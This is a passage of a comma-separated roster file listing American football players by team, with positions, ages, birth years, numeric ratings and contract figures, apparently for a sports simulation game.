Awuzie,22,1996,91,54,77,76,91,62,0.900000,4 CB,Orlando Scandrick,30,1988,78,67,70,82,90,53,2.800000,3 CB,Jourdan Lewis,22,1996,66,60,83,79,89,59,0.600000,4 CB,Anthony Brown,24,1994,93,62,81,79,95,40,0.400000,3 CB,Bene Benwikere,26,1992,85,45,76,79,88,40,0.400000,1 CB,Billy Kafel,25,2014,89,60,79,55,58,63,0.500000,1 LB,Sean Lee,31,1987,66,95,73,91,88,77,5.800000,3 LB,Jaylon Smith,22,1996,95,56,68,71,82,74,1.500000,3 LB,Justin Durant,32,1986,63,61,77,70,76,75,0.600000,1 LB,Anthony Hitchens,25,1993,92,65,85,67,82,76,0.700000,1 LB,Damien Wilson,24,1994,82,60,75,68,81,72,0.500000,2 LB,Justin March-Lillard,24,1994,69,56,68,68,81,71,0.300000,1 LB,Kyle Wilber,28,1990,70,59,70,65,80,71,1.200000,1 DL,Stephen Paea,29,1989,63,61,73,93,93,63,1.600000,1 DL,Richard Ash,25,1993,82,35,73,77,86,63,0.300000,2 DL,Maliek Collins,22,1996,69,61,76,71,86,76,0.700000,3 DL,Tyrone Crawford,28,1990,83,67,68,67,85,75,6.900000,4 DL,Taco Charlton,23,1995,81,45,81,64,84,80,2.400000,4 DL,Charles Tapper,24,1994,73,40,81,65,85,76,0.600000,3 DL,DeMarcus Lawrence,25,1993,79,71,75,64,82,79,1.200000,1 DL,Lewis Neal,22,1996,92,35,76,65,81,68,0.300000,1 DL,David Irving,24,1994,82,63,71,60,77,77,0.400000,1 DL,Benson Mayowa,26,1992,79,60,67,57,76,76,2.400000,2 END_PLAYERS New York Giants,NYG QB,Geno Smith,27,1991,77,50,76,83,78,55,0.800000,1 QB,Davis Webb,22,1996,77,45,73,87,76,47,0.700000,4 QB,Eli Manning,36,1982,51,75,95,81,83,37,18.200000,3 RB,Orleans Darkwa,25,1993,78,64,76,75,90,79,0.700000,1 RB,Wayne Gallman,23,1995,87,58,77,76,89,76,0.500000,4 RB,Paul Perkins,23,1995,71,63,71,70,89,76,0.400000,3 RB,Shane Vereen,28,1990,58,65,76,65,88,74,3.300000,1 RB,Rhett Ellison,29,1989,51,62,64,56,81,55,3.600000,4 WR,Odell Beckham Jr.,25,1993,91,89,81,79,94,79,3.300000,2 WR,Sterling Shepard,24,1994,99,75,79,77,90,72,1.300000,3 WR,Evan Engram,23,1995,95,58,73,70,90,79,2.600000,4 WR,Brandon Marshall,33,1985,61,71,87,73,86,76,4.100000,2 WR,Dwayne Harris,30,1988,80,58,81,65,87,77,2.700000,3 WR,Tavarres King,27,1991,74,45,73,62,89,74,0.400000,1 WR,Roger Lewis,24,1994,70,54,73,63,91,69,0.300000,2 WR,Jerell Adams,25,1993,74,40,70,62,84,60,0.400000,3 WR,Matt LaCosse,25,1993,91,40,73,60,82,59,0.300000,1 OL,DJ Fluker,26,1992,78,60,76,83,73,59,2.800000,1 OL,Ereck Flowers,23,1995,91,60,75,81,72,60,3.600000,2 OL,Justin Pugh,27,1991,78,75,76,77,82,60,2.800000,1 OL,Weston Richburg,26,1992,74,79,81,79,77,60,1.100000,1 OL,John Jerry,31,1987,75,70,60,77,75,60,2.600000,3 OL,Brett Jones,26,1992,86,45,70,71,73,62,0.300000,1 OL,Bobby Hart,23,1995,70,63,73,71,74,59,0.400000,2 OL,Stuart Ferriola,32,2007,90,81,54,69,58,66,0.500000,1 OL,Chad Wheeler,23,1995,88,45,70,65,72,60,0.400000,3 OL,Zak DeOssie,33,1985,67,63,79,58,57,54,0.700000,2 K,Brad Wing,26,1992,91,45,70,83,82,45,1.400000,3 K,Aldrick Rosas,23,1995,95,40,61,79,80,40,0.300000,2 S,Landon Collins,23,1995,94,85,77,79,88,82,1.400000,2 S,Darian Thompson,24,1994,96,58,76,75,86,74,0.700000,3 S,Andrew Adams,24,1994,92,50,76,74,88,62,0.300000,2 S,Nat Berhe,26,1992,78,45,76,72,87,60,0.400000,1 CB,Janoris Jenkins,29,1989,77,79,83,86,91,60,8.100000,4 CB,Dominique R-Cromartie,31,1987,65,83,68,90,93,37,5.600000,2 CB,Ross Cockrell,26,1992,70,61,79,79,90,43,1.100000,1 CB,Eli Apple,22,1996,67,58,79,79,92,40,3.800000,3 CB,Aurelio Courts,26,2013,73,74,66,66,69,59,0.500000,1 CB,John Demario,30,2009,66,72,57,55,63,65,0.500000,1 LB,Devon Kennard,26,1992,95,63,70,75,84,71,0.600000,1 LB,BJ Goodson,24,1994,98,52,76,73,88,71,0.600000,3 LB,Keenan Robinson,28,1990,72,61,71,68,83,77,1.900000,1 LB,Jonathan Casillas,30,1988,67,64,61,68,75,76,2.100000,1 LB,Calvin Munson,23,1995,85,45,76,68,83,66,0.300000,3 LB,Mark Herzlich,30,1988,73,60,76,63,80,67,0.600000,1 LB,JT Thomas,29,1989,66,56,73,64,75,70,2.400000,1 LB,Curtis Grant,25,1993,86,40,67,62,80,67,0.300000,2 LB,Deontae Skinner,27,1991,67,45,75,62,73,66,0.400000,1 DL,Damon Harrison,29,1989,62,91,73,87,97,72,6.800000,4 DL,Robert Thomas,26,1992,80,40,63,89,88,57,0.300000,1 DL,Jason Pierre-Paul,28,1990,90,76,76,73,92,82,12.800000,4 DL,Dalvin Tomlinson,23,1995,68,64,73,75,89,70,0.900000,4 DL,Kerry Wynn,26,1992,89,45,73,75,85,69,1.100000,1 DL,Corbin Bryant,29,1989,63,52,70,75,84,68,0.500000,1 DL,Jay Bromley,25,1993,75,56,73,73,83,70,0.600000,1 DL,Olivier Vernon,27,1991,71,76,83,70,87,77,10.700000,4 DL,Avery Moss,23,1995,75,40,71,62,81,79,0.500000,4 DL,Devin Taylor,28,1990,67,56,73,60,75,71,0.500000,1 END_PLAYERS Philadelphia Eagles,PHI QB,Carson Wentz,25,1993,90,73,85,85,85,71,6.900000,3 QB,Nick Foles,28,1990,67,58,71,81,77,37,3.300000,2 RB,Jay Ajayi,24,1994,69,76,67,79,88,84,0.400000,2 RB,LeGarrette Blount,31,1987,62,93,77,81,87,77,0.900000,1 RB,Wendell Smallwood,23,1995,83,59,79,70,91,77,0.400000,3 RB,Corey Clement,23,1995,82,40,73,75,87,77,0.300000,3 RB,Kenjon Barner,27,1991,60,40,79,61,92,76,0.400000,1 RB,Trey Burton,26,1992,75,61,85,60,86,75,1.700000,1 WR,Zach Ertz,27,1991,68,91,76,87,80,69,6.300000,5 WR,Alshon Jeffery,27,1991,67,75,81,79,89,71,10.800000,1 WR,Nelson Agholor,24,1994,89,63,75,68,91,75,2.300000,2 WR,Mack Hollins,24,1994,69,56,75,70,90,70,0.600000,4 WR,Torrey Smith,28,1990,61,63,83,70,90,71,3.100000,3 WR,Shelton Gibson,22,1996,84,40,73,67,93,70,0.500000,4 WR,Marcus Johnson,23,1995,93,45,71,62,93,63,0.300000,2 WR,Brent Celek,32,1986,40,75,76,73,75,62,3.300000,2 OL,Jason Peters,35,1983,60,91,79,91,85,77,8.100000,3 OL,Brandon Brooks,28,1990,87,75,70,91,82,75,6.400000,4 OL,Chance Warmack,26,1992,99,59,83,85,74,61,0.600000,2 OL,Lane Johnson,27,1991,65,81,81,77,87,75,8.300000,4 OL,Jason Kelce,30,1988,62,75,68,73,98,61,4.700000,4 OL,Stefen Wisniewski,28,1990,89,61,85,73,78,63,2.000000,3 OL,Isaac Seumalo,24,1994,74,60,73,71,73,60,0.600000,3 OL,Halapouliva Vaitai,24,1994,69,52,79,68,74,60,0.400000,3 OL,Taylor Hart,26,1992,86,45,77,61,78,60,0.400000,1 OL,Rick Lovato,25,1993,98,40,76,59,51,56,0.300000,1 K,Jake Elliott,22,1996,87,40,63,95,86,40,0.500000,4 K,Donnie Jones,37,1981,72,45,67,73,81,45,0.900000,2 S,Malcolm Jenkins,30,1988,82,68,91,79,86,75,6.400000,3 S,Corey Graham,32,1986,50,62,79,76,87,76,1.300000,1 S,Rodney McLeod,27,1991,83,67,77,77,85,69,5.400000,4 S,Jaylen Watkins,26,1992,87,57,79,75,91,55,0.400000,1 CB,Ronald Darby,23,1995,80,67,67,84,93,53,1.000000,2 CB,Jalen Mills,23,1995,93,58,73,79,90,53,0.400000,3 CB,Sidney Jones,21,1997,93,50,68,75,90,62,1.400000,4 CB,Rasul Douglas,24,1994,71,54,77,72,87,57,0.600000,4 CB,Patrick Robinson,30,1988,56,68,71,77,88,44,0.500000,1 CB,Dexter McDougle,26,1992,85,40,64,74,91,40,0.400000,2 LB,Jordan Hicks,25,1993,94,75,67,73,85,77,0.600000,2 LB,Mychal Kendricks,27,1991,66,63,73,71,83,79,5.500000,3 LB,Nigel Bradham,28,1990,66,76,87,71,81,79,2.800000,1 LB,Joe Walker,25,1993,83,40,79,71,83,70,0.400000,3 LB,Kamu Grugier-Hill,23,1995,72,35,83,63,78,71,0.400000,3 LB,Nathan Gerry,22,1996,90,40,73,60,75,69,0.400000,4 LB,Najee Goode,28,1990,78,45,73,60,75,69,0.600000,1 DL,Elijah Qualls,22,1996,91,40,79,87,90,69,0.400000,4 DL,Fletcher Cox,27,1991,71,73,77,79,94,79,14.100000,6 DL,Brandon Graham,29,1989,67,79,76,75,90,80,4.700000,2 DL,Timmy Jernigan,25,1993,78,75,71,75,88,75,6.100000,5 DL,Derek Barnett,21,1997,77,54,73,76,86,74,3.200000,4 DL,Beau Allen,26,1992,89,61,76,77,88,63,0.400000,1 DL,Chris Long,32,1986,74,62,79,75,83,74,1.400000,2 DL,Destiny Vaeao,23,1995,85,45,68,71,85,67,0.300000,2 DL,Vinny Curry,29,1989,88,60,75,67,82,75,7.200000,4 DL,Steven Means,27,1991,89,45,65,56,75,74,0.600000,2 END_PLAYERS Washington Redskins,WAS QB,Kirk Cousins,29,1989,83,71,81,85,85,40,15.000000,1 QB,Colt McCoy,31,1987,51,58,85,67,76,46,2.300000,2 RB,Rob Kelley,25,1993,61,68,77,79,86,77,0.300000,2 RB,Samaje Perine,22,1996,84,59,73,75,87,75,0.600000,4 RB,Chris Thompson,27,1991,78,75,58,67,91,74,1.700000,1 RB,Niles Paul,28,1990,57,56,71,57,88,67,1.500000,1 WR,Jordan Reed,27,1991,60,89,70,89,86,77,8.300000,4 WR,Jamison Crowder,24,1994,77,71,79,76,91,72,0.500000,2 WR,Josh Doctson,25,1993,79,59,75,73,89,74,2.400000,3 WR,Terrelle Pryor Sr.,28,1990,68,70,77,73,91,72,5.600000,1 WR,Brian Quick,28,1990,88,60,75,73,87,74,0.600000,1 WR,Vernon Davis,33,1985,42,71,76,70,87,70,4.000000,3 WR,Ryan Grant,27,1991,65,62,71,68,88,66,0.400000,1 WR,Jeremy Sprinkle,23,1995,91,40,75,61,84,67,0.500000,4 OL,Trent Williams,29,1989,87,91,79,91,89,77,9.600000,4 OL,Brandon Scherff,26,1992,83,85,77,85,88,60,5.500000,2 OL,Morgan Moses,26,1992,80,75,71,79,87,60,5.400000,6 OL,Spencer Long,27,1991,81,73,64,77,74,63,0.700000,1 OL,Shawn Lauvao,30,1988,89,65,76,75,75,60,3.300000,1 OL,Chase Roullier,24,1994,98,40,79,73,77,60,0.400000,4 OL,Ty Nsekhe,32,1986,68,62,65,71,82,62,0.400000,1 OL,TJ Clemmings,26,1992,72,59,77,73,73,58,0.500000,2 OL,Tyler Catalina,24,1994,84,40,76,67,77,58,0.300000,3 OL,Nick Sundberg,30,1988,69,45,64,56,67,45,0.800000,4 K,Tress Way,27,1991,69,45,70,97,84,45,1.100000,4 K,Nick Rose,23,1995,84,35,54,35,88,35,0.300000,1 S,DeAngelo Hall,34,1984,75,70,71,79,88,62,3.600000,1 S,Montae Nicholson,22,1996,77,56,70,76,92,62,0.600000,4 S,DJ Swearinger,26,1992,60,70,83,79,83,57,3.600000,3 S,Deshazor Everett,25,1993,83,54,73,76,87,47,0.300000,1 CB,Josh Norman,30,1988,71,91,89,84,88,60,11.300000,4 CB,Kendall Fuller,22,1996,93,61,71,79,90,60,0.600000,3 CB,Fabian Moreau,23,1995,75,45,73,79,94,55,0.700000,4 CB,Bashaud Breeland,25,1993,70,63,73,77,87,53,0.700000,1 CB,Quinton Dunbar,25,1993,82,54,75,76,91,40,0.300000,1 CB,Joshua Holsey,24,1994,82,40,70,71,90,44,0.400000,4 LB,Zach Brown,28,1990,84,77,70,76,80,80,1.800000,1 LB,Martrell Spaight,24,1994,70,60,71,73,84,72,0.400000,2 LB,Mason Foster,28,1990,72,73,77,73,82,70,0.900000,1 LB,Ryan Kerrigan,29,1989,63,79,85,70,88,71,9.200000,4 LB,Ryan Anderson,23,1995,74,45,77,70,86,66,1.100000,4 LB,Will Compton,28,1990,88,60,77,68,81,74,1.100000,1 LB,Preston Smith,25,1993,97,60,73,65,84,71,1.300000,2 LB,Trent Murphy,27,1991,74,65,77,64,84,72,0.900000,1 LB,Josh Harvey-Clemon,23,1995,99,45,73,64,77,69,0.400000,4 LB,Junior Galette,29,1989,78,67,65,63,80,70,0.500000,1 LB,Chris Carter,28,1990,77,56,73,61,73,66,0.600000,1 DL,Arthur Jones,31,1987,65,63,75,81,89,70,0.600000,1 DL,Matt Ioannidis,23,1995,88,60,79,79,89,71,0.300000,2 DL,Terrell McClain,29,1989,82,62,62,79,88,67,4.100000,4 DL,Phil Taylor,29,1989,76,54,62,77,88,70,0.500000,1 DL,Ziggy Hood,30,1988,55,60,68,77,84,69,0.900000,2 DL,Jonathan Allen,22,1996,77,61,71,73,86,74,2.800000,4 DL,Stacy McGee,27,1991,62,61,65,75,85,66,3.600000,5 DL,Anthony Lanier,24,1994,88,40,75,59,75,71,0.300000,2 END_PLAYERS Atlanta Falcons,ATL QB,Matt Ryan,32,1986,75,87,93,89,91,40,16.500000,2 QB,Matt Schaub,36,1982,60,71,73,68,76,37,3.600000,2 RB,Devonta Freeman,25,1993,85,77,83,83,92,90,6.400000,6 RB,Tevin Coleman,24,1994,89,70,73,77,94,82,0.600000,2 RB,Terron Ward,25,1993,83,54,76,70,87,79,0.400000,1 RB,Derrick Coleman,27,1991,73,54,75,65,88,68,0.400000,1 WR,Julio Jones,28,1990,63,99,85,97,94,86,10.400000,4 WR,Mohamed Sanu,28,1990,60,76,83,87,88,75,4.900000,4 WR,Taylor Gabriel,26,1992,95,71,64,75,95,70,1.700000,1 WR,Justin Hardy,26,1992,88,56,79,71,87,76,0.500000,2 WR,Andre Roberts,29,1989,66,64,77,64,89,74,1.400000,1 WR,Nick Williams,27,1991,82,60,76,67,86,67,0.400000,1 WR,Austin Hooper,23,1995,86,60,79,64,82,68,0.600000,3 WR,Marvin Hall,24,1994,74,35,77,57,92,70,0.300000,1 WR,Devin Fuller,23,1995,72,40,75,60,93,63,0.400000,3 WR,Eric Saubert,23,1995,83,40,77,60,83,69,0.400000,4 WR,Levine Toilolo,26,1992,68,64,65,63,76,53,3.100000,3 OL,Alex Mack,32,1986,73,95,89,83,98,77,7.100000,4 OL,Ryan Schraeder,29,1989,62,77,77,76,88,73,4.800000,5 OL,Andy Levitre,31,1987,58,77,85,77,87,63,4.900000,2 OL,Jake Matthews,25,1993,72,70,89,75,86,61,5.200000,2 OL,Sean Harlow,22,1996,70,45,75,75,80,61,0.500000,4 OL,Austin Pasztor,27,1991,85,60,73,70,75,68,0.500000,1 OL,Ben Garland,29,1989,66,45,79,68,80,61,0.400000,1 OL,Wes Schweitzer,24,1994,68,45,77,67,75,59,0.400000,3 OL,Ty Sambrailo,25,1993,97,59,73,64,83,59,0.800000,2 OL,Josh Harris,28,1990,80,45,79,45,61,50,0.600000,2 K,Matt Bryant,42,1976,58,57,60,93,96,57,2.000000,1 K,Matt Bosher,30,1988,70,56,77,85,88,56,1.900000,3 S,Keanu Neal,22,1996,80,61,83,79,87,76,2.600000,3 S,Kemal Ishmael,26,1992,87,60,73,75,85,74,1.600000,1 S,Ricardo Allen,26,1992,77,67,83,80,89,62,0.400000,1 S,Damontae Kazee,24,1994,98,50,79,75,88,62,0.500000,4 S,Sharrod Neasman,26,1992,90,40,75,69,83,67,0.300000,1 CB,Desmond Trufant,27,1991,61,75,76,88,92,70,9.900000,6 CB,Brian Poole,25,1993,95,67,73,75,89,63,0.300000,2 CB,Robert Alford,29,1989,88,62,70,84,93,40,7.200000,4 CB,Jalen Collins,24,1994,83,61,68,79,90,46,1.200000,2 CB,Blidi Wreh-Wilson,28,1990,60,52,70,77,88,43,0.500000,1 CB,CJ Goodwin,27,1991,65,45,71,76,91,37,0.300000,1 LB,Duke Riley,23,1995,86,50,76,76,84,72,0.700000,4 LB,Deion Jones,23,1995,85,73,71,73,82,77,0.900000,3 LB,De'vondre Campbell,24,1994,68,70,77,70,81,79,0.500000,3 LB,Vic Beasley Jr.,25,1993,83,70,71,63,84,80,3.600000,2 LB,Sean Weatherspoon,30,1988,87,54,73,62,80,74,0.600000,1 LB,LaRoy Reynolds,27,1991,61,45,71,63,83,70,1.000000,1 LB,Jermaine Grace,24,1994,92,45,71,62,81,71,0.300000,3 DL,Dontari Poe,27,1991,79,65,85,91,94,77,5.300000,1 DL,Ahtyba Rubin,31,1987,61,61,76,85,91,67,0.600000,1 DL,Grady Jarrett,24,1994,86,71,65,79,89,72,0.400000,2 DL,Adrian Clayborn,29,1989,67,64,71,71,85,75,3.400000,1 DL,Takkarist McKinley,22,1996,85,57,73,67,82,77,2.500000,4 DL,Derrick Shelby,28,1990,77,59,71,68,82,74,3.600000,3 DL,Courtney Upshaw,28,1990,65,58,87,67,84,75,0.800000,1 DL,Brooks Reed,30,1988,74,64,77,61,83,77,3.300000,3 END_PLAYERS Carolina Panthers,CAR QB,Cam Newton,28,1990,85,77,95,95,80,79,15.800000,4 QB,Derek Anderson,34,1984,57,60,83,83,74,37,1.900000,1 QB,Garrett Gilbert,26,1992,72,35,71,73,71,40,0.300000,1 RB,Jonathan Stewart,30,1988,64,77,73,81,86,84,2.500000,2 RB,Christian McCaffrey,21,1997,83,54,76,68,91,77,4.400000,4 RB,Cameron Artis-Payne,27,1991,69,35,76,73,88,74,0.400000,2 RB,Fozzy Whittaker,28,1990,64,59,68,60,88,71,0.800000,2 RB,Alex Armah,23,1995,97,40,87,62,82,67,0.400000,4 WR,Greg Olsen,32,1986,40,95,85,95,85,70,7.200000,2 WR,Devin Funchess,23,1995,85,60,75,70,89,76,1.200000,2 WR,Russell Shepard,27,1991,64,60,76,67,90,74,2.500000,3 WR,Curtis Samuel,21,1997,88,56,75,65,95,69,1.500000,4 WR,Brenton Bersin,27,1991,88,59,75,68,85,68,0.400000,1 WR,Kaelin Clay,25,1993,74,40,67,60,91,67,0.300000,1 WR,Ed Dickson,30,1988,58,68,76,63,83,65,1.700000,1 WR,Chris Manhertz,25,1993,89,45,73,60,78,65,0.300000,1 OL,Tyler Larsen,26,1992,99,56,77,87,82,60,0.300000,1 OL,Andrew Norwell,26,1992,68,79,77,76,80,77,1.700000,1 OL,Trai Turner,24,1994,91,76,76,77,89,64,7.700000,5 OL,Taylor Moton,23,1995,97,45,89,76,83,65,0.800000,4 OL,Ryan Kalil,32,1986,51,81,81,79,81,61,7.100000,1 OL,Daryl Williams,25,1993,95,60,73,76,81,64,0.500000,2 OL,Matt Kalil,28,1990,87,63,81,79,73,60,8.400000,5 OL,Amini Silatolu,29,1989,81,56,76,76,75,60,0.600000,1 OL,Greg Van Roten,27,1991,75,45,75,71,80,61,0.400000,1 OL,John Theus,23,1995,88,45,81,60,74,60,0.400000,3 OL,JJ Jansen,31,1987,77,61,73,58,56,50,0.800000,4 K,Graham Gano,30,1988,54,40,65,95,85,40,2.400000,1 K,Michael Palardy,25,1993,72,40,63,83,78,40,0.300000,1 S,Jairus Byrd,31,1987,68,58,79,79,84,69,0.600000,1 S,Colin Jones,30,1988,74,45,68,75,90,62,0.800000,2 S,Kurt Coleman,29,1989,66,71,76,77,85,63,3.700000,2 S,Mike Adams,36,1982,49,77,71,77,82,67,1.500000,2 CB,Captain Munnerlyn,29,1989,86,60,75,79,89,53,3.700000,4 CB,Ladarius Gunter,25,1993,81,54,75,75,88,60,0.300000,1 CB,James Bradberry,24,1994,76,64,77,77,91,53,0.800000,3 CB,Daryl Worley,22,1996,88,60,79,76,86,46,0.600000,3 CB,Kevon Seymour,24,1994,87,40,65,74,93,40,0.400000,3 CB,Ivan Pasquarelli,27,2012,91,94,74,58,59,59,0.500000,1 LB,Luke Kuechly,26,1992,92,93,93,95,93,84,10.400000,5 LB,Thomas Davis,34,1984,57,77,81,81,84,79,8.400000,2 LB,Shaq Thompson,23,1995,71,64,79,76,84,77,2.100000,2 LB,David Mayo,24,1994,68,45,67,73,83,68,0.400000,2 LB,Andrew Gachkar,29,1989,90,58,70,70,77,69,0.500000,1 LB,Ben Jacobs,29,1989,71,54,79,63,76,67,0.500000,1 LB,Jared Norris,24,1994,70,35,77,63,80,65,0.300000,2 DL,Star Lotulelei,28,1990,77,63,77,93,95,72,2.900000,1 DL,Kawann Short,28,1990,64,79,71,76,90,75,12.600000,5 DL,Vernon Butler,23,1995,76,58,76,70,86,79,2.000000,3 DL,Kyle Love,31,1987,56,64,65,73,86,65,0.800000,2 DL,Julius Peppers,37,1981,65,71,79,68,85,79,3.200000,1 DL,Charles Johnson,31,1987,53,75,75,68,83,74,2.500000,2 DL,Bryan Cox Jr.,23,1995,75,40,68,67,84,74,0.300000,3 DL,Daeshon Hall,22,1996,74,40,77,61,79,76,0.600000,4 DL,Mario Addison,30,1988,56,75,73,61,80,75,6.400000,3 DL,Wes Horton,27,1991,60,60,65,61,77,71,0.800000,2 END_PLAYERS New Orleans Saints,NO QB,Drew Brees,38,1980,75,99,93,81,92,37,7.600000,1 QB,Taysom Hill,27,1991,94,35,71,77,68,70,0.300000,3 QB,Chase Daniel,31,1987,78,57,87,73,76,40,0.600000,1 RB,Alvin Kamara,21,1997,76,59,71,75,88,82,0.800000,4 RB,Mark Ingram,28,1990,55,77,79,77,87,79,3.100000,2 RB,Trey Edmunds,23,1995,70,40,68,63,90,74,0.300000,3 RB,Daniel Lasco,25,1993,76,40,68,61,90,69,0.400000,3 RB,Zach Line,27,1991,74,40,81,67,83,68,0.500000,1 WR,Michael Thomas,23,1995,75,79,77,85,89,72,1.100000,3 WR,Willie Snead,25,1993,87,73,75,75,89,66,0.400000,1 WR,Austin Carr,24,1994,95,40,76,67,86,76,0.300000,3 WR,Brandon Coleman,25,1993,90,62,70,71,87,70,0.300000,1 WR,Coby Fleener,29,1989,85,68,71,71,87,70,4.800000,4 WR,Ted Ginn Jr.,32,1986,52,70,67,63,93,74,2.900000,3 WR,Tommylee Lewis,25,1993,93,40,71,63,91,68,0.300000,2 WR,Josh Hill,27,1991,74,60,68,67,83,66,2.000000,2 WR,Michael Hoomanawanui,29,1989,71,63,68,64,77,46,1.200000,2 OL,Terron Armstead,26,1992,96,79,70,77,78,79,9.500000,5 OL,Zach Strief,34,1984,61,79,79,79,84,60,3.200000,2 OL,Larry Warford,26,1992,70,65,85,79,74,67,6.600000,4 OL,Ryan Ramczyk,23,1995,90,60,83,77,78,63,2.100000,4 OL,Josh LeRibeus,28,1990,60,56,76,77,72,62,0.500000,1 OL,Senio Kelemete,27,1991,82,60,73,75,73,63,0.900000,1 OL,Andrus Peat,24,1994,79,63,67,75,80,59,2.800000,2 OL,Max Unger,31,1987,66,89,81,76,73,60,5.500000,3 OL,Bryce Harris,28,1990,62,45,75,68,82,60,0.500000,1 OL,Zach Wood,24,1994,89,40,70,60,53,45,0.300000,2 K,Thomas Morstead,31,1987,61,54,79,89,94,54,2.700000,2 K,Wil Lutz,23,1995,72,45,63,93,88,45,0.300000,2 S,Marcus Williams,21,1997,85,59,79,77,87,72,1.400000,4 S,Vonn Bell,23,1995,99,60,76,75,88,72,0.800000,3 S,Kenny Vaccaro,26,1992,88,67,87,77,85,72,2.700000,1 S,Rafael Bush,30,1988,62,62,70,77,87,59,0.600000,1 S,Chris Banjo,27,1991,87,45,71,76,88,53,1.000000,2 CB,Marshon Lattimore,21,1997,67,60,64,80,94,62,3.900000,4 CB,PJ Williams,24,1994,77,45,77,76,90,66,0.600000,2 CB,Delvin Breaux,28,1990,66,62,68,77,90,57,0.300000,1 CB,Ken Crawley,24,1994,82,60,77,79,91,43,0.300000,2 CB,De'vante Harris,24,1994,89,40,73,75,88,40,0.300000,2 CB,Booker Keefner,23,2016,89,64,61,57,69,57,0.500000,1 LB,Gerald Hodges Jr.,26,1992,95,64,77,77,82,72,0.500000,1 LB,Craig Robertson,29,1989,81,63,75,75,80,70,1.300000,2 LB,Manti Te'o,26,1992,79,65,77,75,81,72,1.800000,2 LB,Michael Mauti,27,1991,67,59,65,75,85,66,0.500000,1 LB,AJ Klein,26,1992,88,61,83,71,79,70,4.400000,4 LB,Alex Anzalone,23,1995,96,52,64,68,81,70,0.700000,4 LB,Hau'oli Kikaha,25,1993,67,60,64,60,78,71,1.100000,2 DL,Cameron Jordan,28,1990,76,81,85,83,94,79,8.900000,4 DL,Tyeler Davison,25,1993,93,61,67,83,86,67,0.400000,2 DL,David Onyemata,25,1993,72,60,75,79,87,74,0.500000,3 DL,Nick Fairley,29,1989,60,64,77,77,89,74,5.600000,4 DL,Sheldon Rankins,23,1995,71,60,79,75,87,76,3.200000,3 DL,John Hughes III,29,1989,82,57,70,73,86,68,0.500000,1 DL,Trey Hendrickson,23,1995,90,40,77,64,82,79,0.600000,4 DL,Al-Quadin Muhammad,22,1996,87,40,75,63,79,75,0.400000,4 DL,Alex Okafor,26,1992,81,63,85,61,77,70,1.900000,1 END_PLAYERS Tampa Bay Buccaneers,TB QB,Jameis Winston,23,1995,86,65,93,91,80,70,6.600000,2 QB,Ryan Fitzpatrick,35,1983,66,56,75,76,76,43,1.900000,1 QB,Ryan Griffin,28,1990,67,40,73,71,76,37,0.600000,2 RB,Doug Martin,28,1990,65,70,79,85,88,88,4.500000,4 RB,Jacquizz Rodgers,27,1991,68,63,76,79,87,80,1.000000,2 RB,Charles Sims III,27,1991,72,67,75,68,89,75,0.600000,1 RB,Peyton Barber,23,1995,99,40,75,63,86,71,0.300000,2 RB,Luke Stocker,29,1989,64,59,77,57,81,59,1.000000,1 WR,DeSean Jackson,31,1987,52,79,71,81,94,77,7.000000,3 WR,Mike Evans,24,1994,98,93,83,77,88,76,4.900000,2 WR,Adam Humphries,24,1994,99,75,68,77,88,67,0.400000,1 WR,Chris Godwin,21,1997,96,45,89,68,91,77,0.600000,4 WR,Cameron Brate,26,1992,78,71,73,76,80,60,0.400000,1 WR,OJ Howard,23,1995,69,54,89,68,87,72,2.700000,4 WR,Bernard Reedy,26,1992,93,45,71,65,88,67,0.300000,1 WR,Freddie Martino,26,1992,79,40,71,63,89,71,0.400000,1 WR,Antony Auclair,24,1994,69,40,77,58,76,69,0.300000,3 OL,Demar Dotson,32,1986,61,70,76,75,87,79,2.600000,3 OL,Joe Hawley,29,1989,86,71,77,79,77,61,1.800000,2 OL,Ali Marpet,24,1994,74,76,75,77,81,62,0.700000,2 OL,Donovan Smith,24,1994,96,63,68,77,73,60,1.400000,2 OL,Evan Smith,31,1987,62,63,71,73,77,62,2.200000,1 OL,JR Sweezy,28,1990,65,63,70,71,73,64,3.800000,4 OL,Kevin Pamphile,27,1991,72,60,71,68,74,60,0.600000,1 OL,Leonard Wester,24,1994,84,35,71,64,72,61,0.300000,2 OL,Caleb Benenoch,23,1995,76,45,70,63,78,59,0.400000,3 OL,Garrison Sanborn,32,1986,82,45,71,62,66,45,0.600000,1 K,Bryan Anger,29,1989,81,57,81,91,94,57,2.100000,5 K,Patrick Murray,26,1992,94,35,63,85,85,35,0.300000,1 S,Justin Evans,22,1996,82,45,79,77,87,74,1.100000,4 S,TJ Ward,31,1987,53,67,87,77,87,71,4.300000,1 S,Keith Tandy,28,1990,60,61,83,79,87,63,0.600000,1 S,Chris Conte,28,1990,77,67,76,76,86,53,1.600000,2 S,Josh Robinson,26,1992,63,56,71,77,92,40,1.600000,2 CB,Vernon Hargreaves,22,1996,73,54,77,77,90,63,3.500000,3 CB,Brent Grimes,34,1984,58,81,73,84,87,44,4.200000,1 CB,Robert McClain,29,1989,73,58,71,77,87,43,0.500000,1 CB,Javien Elliott,24,1994,66,45,73,71,86,55,0.300000,1 CB,Ryan Smith,24,1994,93,40,73,74,90,40,0.600000,3 CB,Maurice Sahm,29,2010,63,91,60,56,56,57,0.500000,1 LB,Lavonte David,27,1991,69,77,91,79,84,80,6.300000,4 LB,Kendell Beckwith,23,1995,98,63,70,76,88,71,0.600000,4 LB,Kwon Alexander,23,1995,84,71,73,67,83,79,0.500000,2 LB,Adarius Glanton,27,1991,66,52,73,64,82,71,0.400000,1 LB,Cameron Lynch,24,1994,87,40,77,61,82,67,0.400000,1 LB,Devante Bond,24,1994,79,45,71,60,77,70,0.400000,3 DL,Gerald McCoy,29,1989,84,77,75,85,94,79,10.200000,5 DL,Chris Baker,30,1988,62,73,67,81,89,71,3.300000,3 DL,Clinton McDonald,30,1988,73,60,71,77,87,71,1.900000,1 DL,Sealver Siliga,27,1991,63,59,68,77,90,67,0.800000,1 DL,Noah Spence,23,1995,90,58,73,65,81,79,1.300000,3 DL,Robert Ayers,32,1986,50,70,68,63,82,74,4.100000,2 DL,William Gholston,26,1992,60,65,68,62,83,74,3.400000,5 DL,Will Clarke,26,1992,89,45,73,61,79,74,0.400000,1 DL,Ryan Russell,25,1993,68,50,62,63,76,74,0.400000,1 DL,Darryl Tapp,33,1985,54,60,76,58,77,72,0.600000,1 END_PLAYERS Arizona Cardinals,ARZ QB,Carson Palmer,38,1980,71,75,85,83,81,37,15.800000,2 QB,Blaine Gabbert,28,1990,72,60,79,77,75,45,0.600000,1 QB,Drew Stanton,33,1985,63,60,75,79,76,37,2.700000,1 RB,David Johnson,26,1992,77,81,83,85,92,91,0.600000,2 RB,Adrian 